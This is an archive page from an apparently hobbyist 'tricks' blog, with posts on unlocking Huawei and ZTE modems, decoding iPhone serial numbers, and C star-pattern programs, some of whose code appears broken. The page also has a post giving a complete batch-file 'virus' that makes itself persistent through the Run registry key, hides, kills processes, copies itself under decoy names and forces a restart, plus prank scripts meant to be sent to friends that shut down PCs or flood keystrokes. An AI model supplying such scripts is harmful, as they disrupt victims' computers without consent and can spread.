Showing posts with label Tricks. Show all posts
Showing posts with label Tricks. Show all posts

Sunday, September 9, 2012

How to Unlock Huawei and ZTE HSDPA Modems ?

1. Unlock Huawei  HSDPA modems


 i.  Paste this below address to your address bar.

http://bb5.at/huawei.php?imei= your Huawei modem IMEI number 

ii. Now replace your Huawei modem IMEI number with your IMEI number like below

http://bb5.at/huawei.php?imei=357133035912053 

iii. Press Enter key,after you will see like this

 
iv. Now enter this unlock code when it ask the code. you are done. 





2 . Unlock ZTE  HSDPA modems



Some ZTE modems not asking unlock code.so no where to input our code.
so you can't do it like above method.you have to use some software for this.

Download software click here

i. First of all, if you use some memory card, remove it. remove sim  card
   and put sim card what you want to unlock.(it will display invalid sim)

ii.Plug your modem  in to your computer,sometime connection manager will display,close it.

iii. Unzip what you download and open dccrap.exe 


iv. First select the manufacture as ZTE datacards  ( No: 1)

v. Select the model as Auto detect (recommended)  (No : 2 ) If you know the model and
     which com port you use.u can do that way also

vi. Click find button  (No: 3) . after your modem model will display below box

vii. After detect modem click unlock button (No: 4 )

cheers you are done.After few seconds modem will unlock restart your computer and use your modem.This connection manager also working for this.
But if you want to use  ZTE connection manager click below link to download.

click here to download.


Tuesday, August 14, 2012

Know Your I-Phone


Serial number provides some interesting information about your iPhone, like the week it was manufactured, the factory id and much more.


The first step is to locate the Serial Number. The easiest way to find it is to open your Settings app and navigate to General -> About -> Serial Number. You should also see the Serial Number in the Summary tab in iTunes when your iPhone is connected to the computer.

Serial numbers come in the form AABCCDDDEEF

where

> AA = Factory and machine ID
> B = Year manufactured (simplified to final digit, 2010 is 0, 2011 is 1, etc)
> CC = Week of production
> DDD = Unique identifier
> EEF = iPhone model, color of device and size of storage

VR0 (iPhone 2G Silver 4GB) WH8 (iPhone 2G Silver 8GB) 0KH (iPhone 2G Silver 16GB) Y7H (iPhone 3G Black 8GB) Y7K (iPhone 3G Black 16GB) 3NP (iPhone 3GS Black 16GB) 3NR (iPhone 3GS Black 32GB) 3NQ (iPhone 3Gs White 16GB) 3NS (iPhone 3Gs White 32GB) A4S (iPhone 4 Black 16GB) A4T (iPhone 4 Black 32GB)

E00 (iPhone 4 White 32GB) - Courtesy IyonUK

For example, the serial 79028XXXA4S is from factory 79 (presumably Foxconn), was manufactured in 2010 in the 28 week, and is a black 16GB iPhone 4.


Unfortunately, Apple has changed the serial number generation with the CDMA iPhone 4, so this is not applicable for the CDMA iPhone 4 and iPhone 4S.




Friday, April 6, 2012

10 Good Star(*) Pattern C Programs !



  1.          *
          *  *
       *  *  *
    *  *  *  *
    Program:
    /* This is a simple mirror-image of a right angle triangle */
    
    #include
    int main() {
     char prnt = '*';
     int i, j, nos = 4, s;
     for (i = 1; i <= 5; i++) { for (s = nos; s >= 1; s--) {  // Spacing factor
       printf("  ");
      }
      for (j = 1; j <= i; j++) {
       printf("%2c", prnt);
      }
      printf("\n");
      --nos;   // Controls the spacing factor
     }
     return 0;
    }


  2. *                   *
    * * *           * * *
    * * * * *   * * * * *
    * * * * * * * * * * *
  3. Program:
    #include
    int main() {
     char prnt = '*';
     int i, j, k, s, c = 1, nos = 9;
     for (i = 1; c <= 4; i++) {
         // As we want to print the columns in odd sequence viz. 1,3,5,.etc
      if ((i % 2) != 0) {
       for (j = 1; j <= i; j++) {  printf("%2c", prnt); } for (s = nos; s >= 1; s--) { //The spacing factor
        if (c == 4 && s == 1) {
         break;
        }
        printf("  ");
       }
       for (k = 1; k <= i; k++) {
        if (c == 4 && k == 5) {
         break;
        }
        printf("%2c", prnt);
       }
       printf("\n");
       nos = nos - 4;  // controls the spacing factor
       ++c;
      }
     }
     return 0;
    }


  4. *                         *
       *                   *
    *     *             *     *
       *     *       *     *
    *     *      *      *     *
       *     *       *     *
    *     *             *     *
       *                   *
    *                         *
  5. Program:
    #include
    int main() {
     char prnt = '*';
     int i, j, k, s, p, r, nos = 7;
    
     for (i = 1; i <= 5; i++) {
      for (j = 1; j <= i; j++) {  if ((i % 2) != 0 && (j % 2) != 0) { printf("%3c", prnt); } else if ((i % 2) == 0 && (j % 2) == 0) { printf("%3c", prnt); } else { printf("   "); } } for (s = nos; s >= 1; s--) {  // for the spacing factor
       printf("   ");
      }
      for (k = 1; k <= i; k++) { //Joining seperate figures if (i == 5 && k == 1) {  continue; } if ((k % 2) != 0) { printf("%3c", prnt); } else { printf("   "); } } printf("\n"); nos = nos - 2;   // space control }  nos = 1;  // remaining half.. for (p = 4; p >= 1; p--) {
      for (r = 1; r <= p; r++) { if ((p % 2) != 0 && (r % 2) != 0) { printf("%3c", prnt); } else if ((p % 2) == 0 && (r % 2) == 0) { printf("%3c", prnt); } else { printf("   "); } } for (s = nos; s >= 1; s--) {
       printf("   ");
      }
      for (k = 1; k <= p; k++) {
       if ((k % 2) != 0) {
        printf("%3c", prnt);
       }
    else {
        printf("   ");
       }
      }
      nos = nos + 2;  // space control
      printf("\n");
     }
     return 0;
    }


  6. *   *   *   *   *
      *   *   *   *
        *   *   *
          *   *
            *
          *   *
        *   *   *
      *   *   *   *
    *   *   *   *   *
  7. Program:
    #include
    int main() {
     char prnt = '*';
     int i, j, s, nos = 0;
     for (i = 9; i >= 1; (i = i - 2)) {
      for (s = nos; s >= 1; s--) {
       printf("  ");
      }
      for (j = 1; j <= i; j++) {
       if ((i % 2) != 0 && (j % 2) != 0) {
        printf("%2c", prnt);
       } else {
        printf("  ");
       }
      }
      printf("\n");
      nos++;
     }
     nos = 3;
     for (i = 3; i <= 9; (i = i + 2)) { for (s = nos; s >= 1; s--) {
       printf("  ");
      }
      for (j = 1; j <= i; j++) {
    
       if ((i % 2) != 0 && (j % 2) != 0) {
        printf("%2c", prnt);
       } else {
        printf("  ");
       }
      }
      nos--;
      printf("\n");
     }
     return 0;
    }

  8.           *
            * * *
          * * * * *
        * * * * * * *
      * * * * * * * * *
        * * * * * * *
          * * * * *
            * * *
              *
            * * *
          * * * * *
  9. Program:
    #include
    int main() {
     char prnt = '*';
     int i, j, k, s, nos = 4;
     for (i = 1; i <= 5; i++) { for (s = nos; s >= 1; s--) {
       printf("  ");
      }
      for (j = 1; j <= i; j++) {
       printf("%2c", prnt);
      }
      for (k = 1; k <= (i - 1); k++) { if (i == 1) {     continue; } printf("%2c", prnt); }  printf("\n");   nos--; }  nos = 1; for (i = 4; i >= 1; i--) {
      for (s = nos; s >= 1; s--) {
       printf("  ");
      }
      for (j = 1; j <= i; j++) {
       printf("%2c", prnt);
      }
      for (k = 1; k <= (i - 1); k++) {
       printf("%2c", prnt);
      }
      nos++;
      printf("\n");
     }
     nos = 3;
     for (i = 2; i <= 5; i++) { if ((i % 2) != 0) { for (s = nos; s >= 1; s--) {
        printf("  ");
       }
       for (j = 1; j <= i; j++) {
        printf("%2c", prnt);
       }
      }
      if ((i % 2) != 0) {
       printf("\n");
       nos--;
      }
     }
     return 0;
    }


  10.      *
           * *
             * * *
               * * * *
             * * *
           * *
         *
  11. Program:
    /*
        This can be seen as two right angle triangles sharing the same base
        which is modified by adding few extra shifting spaces
    */
    #include
    // This function controls the inner loop and the spacing
    // factor guided by the outer loop index and the spacing index.
    int triangle(int nos, int i) {
     char prnt = '*';
     int s, j;
     for (s = nos; s >= 1; s--) {    // Spacing factor
      printf("  ");
     }
     for (j = 1; j <= i; j++) {      //The inner loop
      printf("%2c", prnt);
     }
     return 0;
    }
    
    int main() {
     int i, nos = 5;
     //draws the upper triangle
     for (i = 1; i <= 4; i++) {  triangle(nos, i);    //Inner loop construction  nos++;              // Increments the spacing factor  printf("\n");  } nos = 7;  //Draws the lower triangle skipping its base. for (i = 3; i >= 1; i--) {
      int j = 1;
      triangle(nos, i);  // Inner loop construction
      nos = nos - j;     // Spacing factor
      printf("\n");
     }
     return 0;
    }


  12. * * * * * * * * *
    * * * *   * * * *
    * * *       * * *
    * *           * *
    *               *
    * *           * *
    * * *       * * *
    * * * *   * * * *
    * * * * * * * * *
  13. Program:
    #include
    
    int main() {
     char prnt = '*';
     int i, j, k, s, nos = -1;
     for (i = 5; i >= 1; i--) {
      for (j = 1; j <= i; j++) {  printf("%2c", prnt); } for (s = nos; s >= 1; s--) {
       printf("  ");
      }
      for (k = 1; k <= i; k++) {
       if (i == 5 && k == 5) {
        continue;
       }
       printf("%2c", prnt);
      }
      nos = nos + 2;
      printf("\n");
     }
     nos = 5;
     for (i = 2; i <= 5; i++) {
      for (j = 1; j <= i; j++) {  printf("%2c", prnt); } for (s = nos; s >= 1; s--) {
       printf("  ");
      }
      for (k = 1; k <= i; k++) {
       if (i == 5 && k == 5) {
        break;
       }
       printf("%2c", prnt);
      }
      nos = nos - 2;
      printf("\n");
     }
     return 0;
    }


  14. * * * * * * * * * * * * * * * * *
      * * * * * * *   * * * * * * *
        * * * * *       * * * * *
          * * *           * * *
            * * * * * * * * *
              * * * * * * *
                * * * * *
                  * * *
                    *
  15. Program:
    #include
    int main() {
     char prnt = '*';
     int i, j, k, s, sp, nos = 0, nosp = -1;
     for (i = 9; i >= 3; (i = i - 2)) {
      for (s = nos; s >= 1; s--) {
       printf("  ");
      }
      for (j = 1; j <= i; j++) { printf("%2c", prnt); } for (sp = nosp; sp >= 1; sp--) {
       printf("  ");
      }
      for (k = 1; k <= i; k++) {  if (i == 9 && k == 1) { continue; } printf("%2c", prnt); } nos++; nosp = nosp + 2; printf("\n"); } nos = 4; for (i = 9; i >= 1; (i = i - 2)) {
      for (s = nos; s >= 1; s--) {
       printf("  ");
      }
      for (j = 1; j <= i; j++) {
       printf("%2c", prnt);
      }
      nos++;
      printf("\n");
     }
    
     return 0;
    }


  16.       *
        * * *
      * * * * *
    * * * * * * *
    *           *
    * *       * *
    * * *   * * *
    * * * * * * *
    * * *   * * *
    * *       * *
    *           *
    * * * * * * *
      * * * * *
        * * *
          *
  17. Program:
    #include
    /*
     * nos = Num. of spaces required in the triangle.
     * i   = Counter for the num. of charcters to print in each row
     * skip= A flag for checking whether to
     *       skip a character in a row.
     *
     */
    int triangle(int nos, int i, int skip) {
     char prnt = '*';
     int s, j;
     for (s = nos; s >= 1; s--) {
      printf("  ");
     }
     for (j = 1; j <= i; j++) {
      if (skip != 0) {
       if (i == 4 && j == 1) {
        continue;
       }
      }
      printf("%2c", prnt);
     }
     return 0;
    }
    
    int main() {
     int i, nos = 4;
     for (i = 1; i <= 7; (i = i + 2)) {
      triangle(nos, i, 0);
      nos--;
      printf("\n");
     }
     nos = 5;
     for (i = 1; i <= 4; i++) { triangle(1, i, 0); //one space needed in each case of the formation triangle(nos, i, 1); //skip printing one star in the last row. nos = nos - 2; printf("\n"); } nos = 1; for (i = 3; i >= 1; i--) {
      triangle(1, i, 0);
      triangle(nos, i, 0);
      nos = nos + 2;
      printf("\n");
     }
     nos = 1;
     for (i = 7; i >= 1; (i = i - 2)) {
      triangle(nos, i, 0);
      nos++;
      printf("\n");
     }
     return 0;
    }


  18. * * * * * * * * * * * * * * * * * * * * * * * * *
      *           *   *           *   *           *
        *       *       *       *       *       *
          *   *           *   *           *   *
            *               *               *
          *   *           *   *           *   *
        *       *       *       *       *       *
      *           *   *           *   *           *
    * * * * * * * * * * * * * * * * * * * * * * * * *
  19. Program:
    #include
    
    /*
     * nos = Num. of spaces required in the triangle.
     * i   = Counter for the num. of characters to print in each row
     * skip= A flag for check whether to
     *       skip a character in a row.
     *
     */
    
    int triangle(int nos, int i, int skip) {
     char prnt = '*';
     int s, j;
     for (s = nos; s >= 1; s--) {
      printf("  ");
     }
     for (j = 1; j <= i; j++) {  if (skip != 0) {  if (i == 9 && j == 1) {    continue;  }  } if (i == 1 || i == 9) {  printf("%2c", prnt); } else if (j == 1 || j == i) {  printf("%2c", prnt);  } else {  printf("  "); }  } return 0; } int main() { int i, nos = 0, nosp = -1, nbsp = -1; for (i = 9; i >= 1; (i = i - 2)) {
      triangle(nos, i, 0);
      triangle(nosp, i, 1);
      triangle(nbsp, i, 1);
      printf("\n");
      nos++;
      nosp = nosp + 2;
      nbsp = nbsp + 2;
     }
     nos = 3, nosp = 5, nbsp = 5;
     for (i = 3; i <= 9; (i = i + 2)) {
      triangle(nos, i, 0);
      triangle(nosp, i, 1);
      triangle(nbsp, i, 1);
      printf("\n");
      nos--;
      nosp = nosp - 2;
      nbsp = nbsp - 2;
     }
     return 0;
    }


Saturday, March 3, 2012

How To Create A Dangerous Virus Using Batch Programming ?



This Virus Can Do Following Things !!!

1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer



copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).





Here is the Code:


@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP





            TRY AT YOUR OWN RISK !


Tuesday, February 7, 2012

Top 9 Dangerous Yet Funny Scripts





ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD... 



===========================================
1) Convey your friend a little message and shut down his / her computer: 
Type : 
@echo off 
msg * I don't like you 
shutdown -c "Error! You are too stupid!" -s 
Save it as "Anything.BAT" in All Files and send it. 



=========================================== 
2) Toggle your friend's Caps Lock button simultaneously: 
Type : 
Set wshShell =wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "{CAPSLOCK}" 
loop 
Save it as "Anything.VBS" and send it. 


===========================================

3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them! 
Type : 
Set oWMP = CreateObject("WMPlayer.OCX.7") 
Set colCDROMs = oWMP.cdromCollection 
do 
if colCDROMs.Count >= 1 then 
For i = 0 to colCDROMs.Count - 1 
colCDROMs.Item(i).Eject 
Next 
For i = 0 to colCDROMs.Count - 1 
colCDROMs.Item(i).Eject 
Next 
End If 
wscript.sleep 5000 
loop 
Save it as "Anything.VBS" and send it. 


=========================================== 
4) Frustrate your friend by making this VBScript hit Enter simultaneously: 
Type : 
Set wshShell = wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "~(enter)" 
loop 
Save it as "Anything.VBS" and send it. 


==============================================
5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out: 
Type : 
WScript.Sleep 180000 
WScript.Sleep 10000 
Set WshShell = WScript.CreateObject("WScript.Shell") 
WshShell.Run "notepad" 
WScript.Sleep 100 
WshShell.AppActivate "Notepad" 
WScript.Sleep 500 
WshShell.SendKeys "Hel" 
WScript.Sleep 500 
WshShell.SendKeys "lo " 
WScript.Sleep 500 
WshShell.SendKeys ", ho" 
WScript.Sleep 500 
WshShell.SendKeys "w a" 
WScript.Sleep 500 
WshShell.SendKeys "re " 
WScript.Sleep 500 
WshShell.SendKeys "you" 
WScript.Sleep 500 
WshShell.SendKeys "? " 
WScript.Sleep 500 
WshShell.SendKeys "I a" 
WScript.Sleep 500 
WshShell.SendKeys "m g" 
WScript.Sleep 500 
WshShell.SendKeys "ood" 
WScript.Sleep 500 
WshShell.SendKeys " th" 
WScript.Sleep 500 
WshShell.SendKeys "ank" 
WScript.Sleep 500 
WshShell.SendKeys "s! " 
Save it as "Anything.VBS" and send it. 



==============================================
6) Frustrate your friend by making this VBScript hit Backspace simultaneously: 
Type : 
MsgBox "Let's go back a few steps" 
Set wshShell =wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "{bs}" 
loop 
Save it as "Anything.VBS" and send it. 



==============================================
7) Hack your friend's keyboard and make him type "You are a fool" simultaneously: 
Type : 
Set wshShell = wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "You are a fool." 
loop 
Save it as "Anything.VBS" and send it. 


==============================================
8. Open Notepad continually in your friend's computer: 
Type : 
@ECHO off 
:top 
START %SystemRoot%\system32\notepad.exe 
GOTO top 
Save it as "Anything.BAT" and send it. 



==============================================

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action: 


1: Shutdown 
2: Restart 
3: Wipes out your hard drive (BEWARE) 
4: Net send 
5: Messages then shutdown 


Type : 
@echo off 
title The end of the world 
cd C:\ 
:menu 
cls 
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc... 
pause 
echo Pick your poison: 
echo 1. Die this way (Wimp) 
echo 2. Die this way (WIMP!) 
echo 3. DO NOT DIE THIS WAY 
echo 4. Die this way (you're boring) 
echo 5. Easy way out 
set input=nothing 
set /p input=Choice: 
if %input%==1 goto one 
if %input%==2 goto two 
Save it as "Anything.BAT" and send it. 








DO EVERYTHING AT YOUR OWN RISK !



Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More